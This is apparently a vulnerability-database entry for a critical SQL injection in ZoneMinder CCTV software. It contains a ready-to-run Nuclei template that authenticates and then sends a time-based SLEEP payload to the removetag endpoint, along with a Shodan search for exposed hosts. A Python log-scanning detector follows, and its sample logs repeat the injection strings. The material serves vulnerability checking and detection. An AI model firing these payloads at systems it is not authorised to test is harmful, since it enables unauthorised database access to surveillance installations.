CVE-2024-51482: ZoneMinder v1.37.* <= 1.37.64 - SQL Injection

Date: 2025-08-01 | Affected software: ZoneMinder | PoC: public

Vulnerability description

ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.

PoC code [public]

id: CVE-2024-51482

info:
  name: ZoneMinder v1.37.* <= 1.37.64 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
  reference:
    - https://securityonline.info/zoneminders-cve-2024-51482-a-10-10-severity-vulnerability-exposes-sql-databases/
    - https://github-production-user-asset-6210df.s3.amazonaws.com/104687644/381894613-3cc50e51-68cf-4540-8225-4288f73e0c08.mp4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241129%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241129T074108Z&X-Amz-Expires=300&X-Amz-Signature=9cc5b01b0482cbd5573c223a1d44e9ffed10afd7d042d76e8308dfcf3bb7e8a5&X-Amz-SignedHeaders=host
    - https://nvd.nist.gov/vuln/detail/CVE-2024-51482
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2024-51482
    cwe-id: CWE-89
    epss-score: 0.45591
    epss-percentile: 0.9754
    cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: zoneminder
    product: zoneminder
    shodan-query: title:"ZoneMinder"
  tags: cve,cve2024,zoneminder,sqli,authenticated

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "ZoneMinder</a>"
          - "ZoneMinder Login</h1>"
          - "<title>ZoneMinder"
        condition: or
        internal: true

  - raw:
      - |
        POST /zm?view=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=login&postLoginQuery=&username={{username}}&password={{password}}

      - |
        GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"result\":\"OK")'
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100e6a35c972141e026a5b8ddce639a909dd3f9e250b4400526c02779d333da8d09022079598cbf6a8452a80a4d012785d5aed6166d3948b7b5b80cb1655ea920cfff16:922c64590222798bb761d5b6d8e72950
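
Detection sketch for the request the template above sends, as an added example that is not part of the original template or of ZoneMinder: it scans web access logs for `request=event&action=removetag` calls whose `tid` is not a plain integer. It assumes combined-format access logs and that a legitimate `tid` is a numeric tag id (as in the template's benign `tid=1` request); the log lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not from a real system.
# The second line carries the query string used by the template's third request.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Aug/2025:10:00:01 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1" 200 45
192.0.2.44 - - [01/Aug/2025:10:00:09 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy) HTTP/1.1" 200 45
192.0.2.10 - - [01/Aug/2025:10:00:12 +0000] "GET /zm/index.php?view=console HTTP/1.1" 200 9120
192.0.2.44 - - [01/Aug/2025:10:00:20 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=2%20OR%201%3D1 HTTP/1.1" 200 45
"""

# Client address, then the quoted request line: METHOD TARGET HTTP/x.y
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_tid_requests(log_text):
    """Return (client_ip, decoded_tid) for removetag requests whose tid is not an integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        # parse_qs URL-decodes values, so '+' and %20 both become spaces
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if query.get("request") != ["event"] or query.get("action") != ["removetag"]:
            continue  # only the endpoint and action named in the template
        for tid in query.get("tid", []):
            # Assumption: a legitimate tag id is digits only
            if not re.fullmatch(r"\d+", tid):
                hits.append((m.group("ip"), tid))
    return hits


if __name__ == "__main__":
    for ip, tid in suspicious_tid_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric tid: {tid!r}")
```

Access logs record only the request line, so the same parameters sent in a POST body would need application-level or WAF logging to be seen.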
